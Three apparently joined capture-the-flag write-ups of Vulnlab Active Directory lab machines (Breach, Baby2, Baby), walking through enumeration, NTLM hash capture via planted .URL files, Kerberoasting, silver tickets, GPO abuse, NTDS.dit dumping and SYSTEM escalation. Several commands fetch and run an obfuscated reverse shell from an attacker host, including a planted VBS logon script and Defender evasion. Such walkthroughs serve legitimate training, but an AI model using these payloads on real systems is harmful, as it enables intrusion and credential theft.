Enumeration

NMAP Scan

sudo rustscan --ulimit 5000 -b 500 -a 10.10.125.15 -- -sC -sV -Pn | tee breach.nmap                                                                                                                                        
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍
---- SNIP ----
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-04-23 16:03:51Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-04-23T16:05:22+00:00; +2s from scanner time.
| ms-sql-info: 
|   10.10.125.15:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.125.15:1433: 
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
 ---- SNIP ----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57892/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
58114/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
63079/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Information from NMAP scan

• We are dealing with a domain controller
• Port 80 is open
• MSSQL is present
• Rest are usual on a DC

SMB Enumeration

nxc smb 10.10.125.15 -u 'asd' -p '' --shares [0]
SMB         10.10.125.15    445    BREACHDC         [*] Windows 10.0 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.125.15    445    BREACHDC         [+] breach.vl\asd: 
SMB         10.10.125.15    445    BREACHDC         [*] Enumerated shares
SMB         10.10.125.15    445    BREACHDC         Share           Permissions     Remark
SMB         10.10.125.15    445    BREACHDC         -----           -----------     ------
SMB         10.10.125.15    445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.10.125.15    445    BREACHDC         C$                              Default share
SMB         10.10.125.15    445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.10.125.15    445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.10.125.15    445    BREACHDC         share           READ,WRITE      
SMB         10.10.125.15    445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.10.125.15    445    BREACHDC         Users           READ            

• share has guest read/write access
• We also have read access on Users share

Exploring share

smbclient.py breach.vl/fdf@10.10.125.15

• we can get 3 user names on transfer folder inside share
• The folder name Transfer sparks a hint , that users may interact with the files present inside.
• Since we have the write access, we can dig further on this.

LDAP Enumeration

• Anonymous bind is not enabled on LDAP

MS-SQL Enumeration

• Anonymous login is not enabled here as well

nxc mssql 10.10.125.15 -u '' -p ''                                                                                                                    [0]
MSSQL       10.10.125.15    1433   BREACHDC         [*] Windows 10.0 Build 20348 (name:BREACHDC) (domain:breach.vl)
MSSQL       10.10.125.15    1433   BREACHDC         [-] ERROR(BREACHDC\SQLEXPRESS): Line 1: Login failed for user 'NT AUTHORITY\ANONYMOUS LOGON'.

Web enumeration

• No intresting leads there as well.

Deep dive on the obtained usernames

• Let's first check if the users are valid and any AS-REP roastable users

kerbrute userenum --dc 10.10.125.15 users -d breach.vl                                                                                                [0]

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 04/23/24 - Ronnie Flathers @ropnop

2024/04/23 21:52:13 >  Using KDC(s):
2024/04/23 21:52:13 >    10.10.125.15:88

2024/04/23 21:52:13 >  [+] VALID USERNAME:    claire.pope@breach.vl
2024/04/23 21:52:13 >  [+] VALID USERNAME:    julia.wong@breach.vl
2024/04/23 21:52:13 >  [+] VALID USERNAME:    diana.pope@breach.vl
2024/04/23 21:52:13 >  Done! Tested 3 usernames (3 valid) in 0.175 seconds

• All user names are valid and no AS-REP roastable users present
• Since there is no further hints on passwords, Let's try usernames as passwords, but no luck

nxc smb 10.10.125.15 -u users -p users --no-bruteforce --continue-on-success                                                                          [2]
SMB         10.10.125.15    445    BREACHDC         [*] Windows 10.0 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.125.15    445    BREACHDC         [-] breach.vl\claire.pope:claire.pope STATUS_LOGON_FAILURE 
SMB         10.10.125.15    445    BREACHDC         [-] breach.vl\diana.pope:diana.pope STATUS_LOGON_FAILURE 
SMB         10.10.125.15    445    BREACHDC         [-] breach.vl\julia.wong:julia.wong STATUS_LOGON_FAILURE 

Deep dive on transfer folder

• Since we have write access on this folder, lets drop an scf file to see if there are any interactions received on responder
• Start responder

sudo responder -v -I tun0

SCF file

[Shell]
Command=2
IconFile=\\10.8.2.13\share\v3l5.ico
[Taskbar]
Command=ToggleDesktop

• Lets upload it into transfer folder and see if we get interaction.
• Note that, the scf file should be at first.
• Unfortunately, no interaction was received. Not sure why?

Lets' try another vector uploading .URL file and we got an interaction on responder as user Julia.Wong

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.8.2.13\%USERNMAE%.icon
IconIndex=1

Initial Access

• Let's try to crack the hash using hashcat using rockyou.txt wordlist

  hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

• We have successfully cracked and obtained the clear text password.
  
• Verify the level of access using nxe
  
• We have additional read access to NETLOGON and SYSVOL
  • Enumerated shares again , but no interesting leads here
• No winrm, RDP access
• low privileged user access on mssql

Bloodhound

• Lets run bloodhound to get useful details about Domain objects.

bloodhound-python -d 'breach.vl' -u 'Julia.Wong' -p 'XXXXXXXXX' -c all -ns 10.10.86.42

• We found a kerberoastable user svc_mssql

Kerberoasting

• using Impacket , lets get the hash

GetUserSPNs.py -request -dc-ip 10.10.86.42 breach.vl/Julia.Wong:'XXXXXXXXXX'

hashcat -m 13100 --force -a 0 sqlsvchash /usr/share/wordlists/rockyou.txt

• Password cracked

• Check if we have administrator privileges over MSSQL DB using nxe

• Unfortunately, we still have only guest privileges on MSSQL db.

Generating Silver ticket

• Lets get a silver ticket as Administrator user, which will get us Administrative privileges over MSSQL DB
• We can use ticketer.py to generate the silver ticket. Required details are available on the bloodhound results
  • Domian SID: S-1-5-21-2330692793-3312915120-706255856
  • SPN: MSSQLSvc/breachdc.breach.vl:1433
  • NTLM hash - Since the password is known, we use any online tools to generate the hash.

ticketer.py -nthash 6959XXXXXXXXXXXXXXXX70E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn 'MSSQLSvc/breachdc.breach.vl:1433' Administrator

• export the ccache file - export KRB5CCNAME=Administrator.ccache
• Let's check if the ccache file is working

• We got the administrator access over MSSQL

  Shell Access

• Login using mssqlclinet.py

mssqlclient.py Administrator@BREACHDC.breach.vl -k -no-pass -windows-auth -dc-ip 10.10.86.42

• Enable XP cmd shell which allows us to run any command.

• Let's get a reverse shell. When i tried conpty shell, It gets blocked by the Defender.
• So, lets go with a simple Nishang's tcp reverse shell and invoke the reverse shell function within the script itself.
• For Obfuscation, I used - https://github.com/JoelGMSec/Invoke-Stealth
• Run below and rename the file, I renamed the obfuscated script to ps.txt

pwsh Invoke-Stealth.ps1 /opt/tools/Nishang/ps.ps1 -t PyFuscation

• We were able to get a reverse shell using that and bypassed defender successfully for now

xp_cmdshell powershell IEX(IWR http://10.8.2.13:8000/ps.txt -UseBasicParsing);

Privilege Escalation

• svc_mssql has Se-impersonate Privilege enabled.
• We can use JuicyPotatoNG.exe to abuse the Se-impersonate and achieve privilege escalation.
• We are able to get command execution as SYSTEM

./JuicyPotatoNG.exe -t * -p C:\windows\system32\cmd.exe -a "/c powershell IEX(IWR http://10.8.2.13:8000/ps.txt -UseBasicParsing);"

Note: Before trying JuicyPotatoNG , I tried petitpotato.exe & godpotato.exe - I'm able to get a simple command execution, but not a reverse shell. Petitpotato closed execution before even fully downloading the reverse shell script & godpotato was very slow and broke the box

That's all for now. I hope you enjoyed this writeup. For any questions/suggestions, Please feel free to connect with me on LinkedIn.

References

• https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#which-endpoint-protection-is-using-amsi
• https://github.com/antonioCoco/JuicyPotatoNG
• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket

Summary

Initial access is through finding a valid set of credentials , which has extensive permission to write on a share that hosts a vb script. Replacing the script with a malicious one get's our initial shell as user Amelia.Griffiths. From there, We could enumerate AD further to find interesting ACLs that the user Amelia.Griffiths have on gpoadm user.

Further, gpoadm user have "GenericAll" rights over 2 GPOs, Using pyGPOAbuse, we can create and execute a scheduled task as SYSTEM user to add gpoadm to the local administrator group granting us the administrator access.

Enumeration

NMAP Scan

└─➜ sudo rustscan --ulimit 5000 -b 500 -a 10.10.110.149 -- -sC -sV -Pn | tee baby2.nmap                                                                                                                                                           [130]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.110.149:53
Open 10.10.110.149:88
Open 10.10.110.149:135
Open 10.10.110.149:139
Open 10.10.110.149:389
Open 10.10.110.149:445
Open 10.10.110.149:464
Open 10.10.110.149:593
Open 10.10.110.149:636
Open 10.10.110.149:3268
Open 10.10.110.149:3269
Open 10.10.110.149:3389
Open 10.10.110.149:9389

• Open ports - 53,88,389 are common in Domain Controller.
• Quick nxc scan confirm that, we are indeed dealing with a DC

• We also have anonymous login enabled and shares that have read and write privileges.

Service Enumeration

• Let's dig deeper on the SMB service.
• I'm going to use impacket's smbclient to connect and enumerate the file system

smbclient.py baby2.vl\sdaasda@10.10.110.149

Enumerating apps share

on smbclient

type `shares` to list all the shares
type `use <share_name>` - to select a share
tyep `mget *` - to download all files present

• 2 files - changelog and login.vbs.lnk files are present
• download both files

• CHANGELOG file hints about some automation activity

• Running strings on login.vbs.lnk shows that login.vbs script is most likely fetched from SYSVOL share. But we do not have access to SYSVOL share

Enumerating homes share

• homes share is where we have read and write privileges

• It looks like C:/Users folder as it reveals so many usernames

  

• Since there are many folder we can use nxe's spider_plus module to recursively look into the each folders and identify any interesting files

• Apparently there are no files available inside any of the folders

nxc smb 10.10.110.149 -u 'dsad' -p '' --shares -M spider_plus

Enumerating NETLOGON share

• Only 1 file present - login.vbs
• It looks like the automation script that changelog talked about

At this point, Since we have a writable share, Tried scf attack on the homes share and was unsuccessful as there were no interaction received on responder to grab hashes.

Initial Access

• With the usernames we got, let's check if they are valid and any AS-REP roastable users present

kerbrute userenum --dc 10.10.110.146 -d baby2.vl

• All users are valid and no AS-REP roastable users present
• Next step is to check the description of the users, but LDAP anonymous bind is not enabled which stops us from doing few more checks.
• With no hints about passwords, our only option is to try bruteforce with usernames as password.

nxc smb 10.10.101.190 -u usernames -p usernames --no-bruteforce --continue-on-success

• --no-bruteforce flag will bruteforce line 1 to line 1 and don't mix match the provided list& continue-on-sucess flag will not stop the bruteforce with one valid combination

Excellent ! we got 2 user accounts, with a valid combination

Enumerating Permissions

• Both the user has read & Write access to apps & docs shares. But It's always best to check the access manually on the shares as we cannot rely fully on the tool's output
• Since we have access to apps folder, I tried to replace login.vbs.lnk with a malicious lnk file so that we can get our required interaction on responder to capture the NET-NTLMv2 hash.
• But no luck there, It allows us to upload new files but unable to replace a existing file
• No interesting files under docs directory as well
• We are left with SYSVOL, Upon enumeration it has the login.vbs file which is present on the .lnk file as previously mentioned, surprisingly we are allowed to put/replace files in that share
• Now the initial access starting to takes shape, Since we have a vb script present, we can put vbs reverse shell inside the script to get our initial shell
• I have added a vbs wscript shell execution code into login.vbs to execute my ConPty reverse shell

Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("powershell.exe IEX(IWR http://10.8.2.13:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.8.2.13 4444")

• Let's upload it into SYSVOL and wait for the callback
• Finally, we got our reverse shell as user Amelia.Griffiths

AD Enumeration

• As usual, the first step is to check the privileges whoami /priv and we don't see any privileges that we can abuse to escalate our privileges

• Using Powerview , Let's start enumerating the AD.
• Whenever I'm on an AD network, Below are the few things that I do no matter what, to get an overview about the field I'm in. Most of the time, these would give the quick wins or help us to understand the next possible steps
  • Enumerate Users
  • Enumerate Users description
  • Enumerate Computers
  • Enumerate Domain shares
  • Enumerate Groups
  • Enumerate Non-Default group's members
  • Enumerate Domain Admin group members
  • Enumerate Interesting ACLs
  • Enumerate Kerberostable users
  • Enumerate AS-REP roastable users
  • Enumerate LAPS Delegated groups
  • Enumerate Unconstrained delegation
  • Enumerate Users & Computers with Constrained delegation

Enumerating Interesting ACLs

Invoke-AClScanner -ResolveGUID

• Looks like gpoadm object has "GenericAll" access to group policies (snipped in screenshot)
• Also the legacy object has WriteDACL, WriteOwner access on gpoadm and gpo-management object

• Also we are part of legacy group, with that we can takeover gpoadm user and then can abuse GenericAll access on group policies to escalate our privileges

Privilege Escalation

Takeover gpoadm

• First step is to add GenericAll rights on gpoadm.

Add-DomainObjectAcl -TargetIdentity "gpoadm" -PrincipalIdentity "legacy" -Domain baby2.vl -Rights All -Verbose

• With the "GenericAll" rights, we can force change the password of gpoadm user

net user gpoadm Password1! /domain

• We have successfully changed the password

BloodHound Enumeration

• We already know that the gpoadm user has GenericAll rights over group policy objects. We'll also use bloodhound to look into it.
• Spin up Bloodhound CE

curl -L https://ghst.ly/getbhce | sudo docker-compose -f - up

• Download the latest release of bloodhound.py which is compatible with the CE Edition

bloodhound-python -d 'baby2.vl' -u 'gpoadm' -p 'Password1!' -c all -ns 10.10.101.190

• Upload the results to bloodhound. we could see the same results visually that gpoadm user has Generic All access over 2 group policy objects

Abusing GPO

• As per recommendation by BloodHound CE , We'll use pyGPOAbuse.py. GPO-ID can be obtained from the bloodHound itself by selecting respective object

python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -gpo-id '6AC1786C-XXXXXXXXXXX-00C04FB984F9' -command 'net localgroup administrators gpoadm /add' -f -dc-ip 10.10.101.190

• Give few minutes for the scheduled task to run.
• We have successfully added gpoadm user to Administrators group

• Login using impacket's psexec

psexec.py gpoadm:'Password1!'@10.10.119.236

We are now logged in as nt authority\system. I hope you enjoyed this writeup. For any questions/suggestions, Please feel free to connect with me on LinkedIn.

References

• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#writedacl--writeowner
• https://github.com/dirkjanm/BloodHound.py/tree/bloodhound-ce
• https://github.com/Hackndo/pyGPOAbuse/blob/master/pygpoabuse.py
• https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

Hello Everyone ! This is an writeup of Vulnlab's Baby (easy) machine. For Initial access, LDAP is enumerated to identify users and initial setup password from the AD user object's description. One of the user's logon status was found to be STATUS_PASSWORD_MUST_CHANGE and the password is successfully reset. With the valid credentials, we got the initial shell using evil-winrm.

For Privilege Escalation, SeBackupPrivilege is abused to obtain the shadow copy of NTDS.dit and SYSTEM. With that, Domain users' hashes are dumped and used to become a domain administrator.

Enumeration

NMAP Scan

sudo rustscan --ulimit 5000 -b 500 -a 10.10.83.11 -- -sC -sV -Pn | tee baby.nmap
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
---- SNIP ----

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-04-20 09:18:24Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl

---- SNIP ----

| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: **BABY**
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: **baby.vl**
|   DNS_Computer_Name: **BabyDC.baby.vl**
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-20T09:19:15+00:00
|_ssl-date: 2024-04-20T09:19:56+00:00; -3s from scanner time.
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
52557/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

---- SNIP ----

Information from NMAP scan

• Open DNS, SMB, Kerberos & LDAP ports shows that we are dealing with mostly an AD domain controller
• DNS Computer name confirms that - BabyDC.baby.vl
• We have open RDP and WinRM ports as well, which we can use it later when we get a valid username, password/NTLM hash
• Lets add the IP and host name to the /etc/hosts file

Service Enumeration

SMB

• First step is to test for anonymous login. There are many tools that can be used to test this. E.g.: smbclient, smbmap, netexec (formerly crackmapexec) etc.
• I'm using netexec to test the same

nxc smb 10.10.83.11 -u '' -p '' --shares 

nxc smb 10.10.83.11 -u 'no_such_user' -p '' --shares 

• Anonymous login is not successful and no shares are listed
• If the anonymous login is successful and there are some readable shares listed, Then the next step is to run enum4linux against the target as it can help to obtain some additional information like users, groups, password policy etc.
• Unfortunately we cannot do anything further here. Let's move on to LDAP

LDAP

• First test on LDAP is to check if anonymous bind is allowed, so that we can enumerate users, groups, computers & other AD objects.

nxc ldap BABYDC.baby.vl -u '' -p '' --users | tee tempusers

• User details are obtained. Deleted the unwanted details from the saved file and we have in total 11 users

• Above details are just the names not the actual usernames. We'll use impacket's getADUsers.py script to get the user names.

GetADUsers.py -all baby.vl/ -dc-ip 10.10.83.11                                                                          

• we could see that there are only 8 users listed here , but we have got 11 users when we enumerated through netexec.
• Nevertheless we know the format of the usernames here - [firstname].[lastname]
• Let's add the missing usernames Ian.Walker,Caroline.Robinson & Administrator and create a list
• net exec's ldap has several modules that we can use to enumerate the domain objects further with anonymous login

• First few modules on the list are not interesting at the moment as we are looking for hints about credentials.
• Right now, Potential entry points can be obtained from the description of the user objects, AS-REP roastable users, where we can get the hash and crack it offline to get a valid credentials or password bruteforce with the users list available
• We'll start with enumerating the user's description

nxc ldap BabyDC.baby.vl -u '' -p '' -d baby.vl -M get-desc-users                                                        

• we got information about the initial password of Teresa.Bell present in the description
• Upon testing, it happens to be an invalid credential.

• Lets spray the password on all the users.

• Still no valid credentials, but the user Caroline.Robinson 's logon status is STATUS_PASSWORD_MUST_CHANGE.
• The account is marked to indicate that the password must be changed on the next logon
• It's possible that the password found in the description is the old password

Foothold

Changing Caroline's password

smbpasswd -U baby.vl/Caroline.Robinson -r 10.10.83.11

• Password changed to Password1!
• We'll first verify if the password is successfully changed and it is a success

• Now we have an valid credential, next step is to check the services that Caroline.Robinson has access to, so that we can get a shell
• Always check ssh, rdp, wmi, winrm, mssql services for all the valid credentials obtained as per the open ports
• Here we have only rdp, winrm, wmi ports open, so lets test one by one
• No luck with RDP & WMI, but the user has privileges to use winrm. It can be confirmed by the Pwn3d! keyword against the username

Initial shell access via Evil-WinRm

evil-winrm -i 10.10.83.11 -u 'Caroline.Robinson' -p 'Password1!

• Next step is to do privilege escalation to get Administrator access on the machine
• Quick wins are first to enumerate the user groups & privileges the user has

• Backup Operators group & SeBackupPrivilege draws the attention
• SeBackupPrivilege can be abused to get a copy of NTDS.dit and SYSTEM file which can used to dump the NTLM hashes from DC

Privilege Escalation

• There are various methods present that can be used to abuse SeBackupPrivilege. I'll be using diskshadow method described on https://juggernaut-sec.com/sebackupprivilege/ to obtain the shadow copy of NTDS.dit and SYSTEM files
• diskshadow.exe is an interactive command but we currently have a non-interactive session using evil-winrm. we have to craft a txt file that can be used with diskshadow.exe. This will allow us to execute required commands to create shadow copy

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii 
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append 
echo "create" | out-file ./diskshadow.txt -encoding ascii -append 
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

• Create a temp folder on C:/ and run below command to create shadow copy

diskshadow.exe /s C:\Users\Caroline.Robinson\Documents\diskshadow.txt

• Lets copy the SYSTEM and NTDS.dit file using robocopy

Note: Since we are in DC, we are targeting NTDS.dit file. For Standalone machines, SAM must be targeted. The SAM file contains local user hashes, whereas the NTDS.dit file contains all of the domain user hashes

robocopy /b Z:\Windows\system32\Config C:\temp  SYSTEM

robocopy /b Z:\Windows\NTDS\ C:\temp  ntds.dit

• Download it to Kali machine and we can dump the hashes using impacket's secretsdump.py

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

• Use the Administrator's (Domain Admin) NTLM hash to login to the machine

evil-winrm -i 10.10.90.138 -u 'Administrator' -H 'redacted'

Conclusion

Finally we pwned the baby machine from Vulnlab. Key take away's from this machine personally are

• Attention to the minor details during enumeration
• Difference in abusing SeBackupPrivilege between a domain joined and a standalone machine

I know, this is an long post for an easy machine. Tried to add extensive details and screenshots to help the beginners doing their first few boxes. Thank you for sticking till last. Cheers !

References

https://juggernaut-sec.com/sebackupprivilege/
https://learn.microsoft.com/en-us/windows/win32/api/subauth/nf-subauth-msv1_0subauthenticationroutineex
https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap#ldap-anonymous-binds
https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/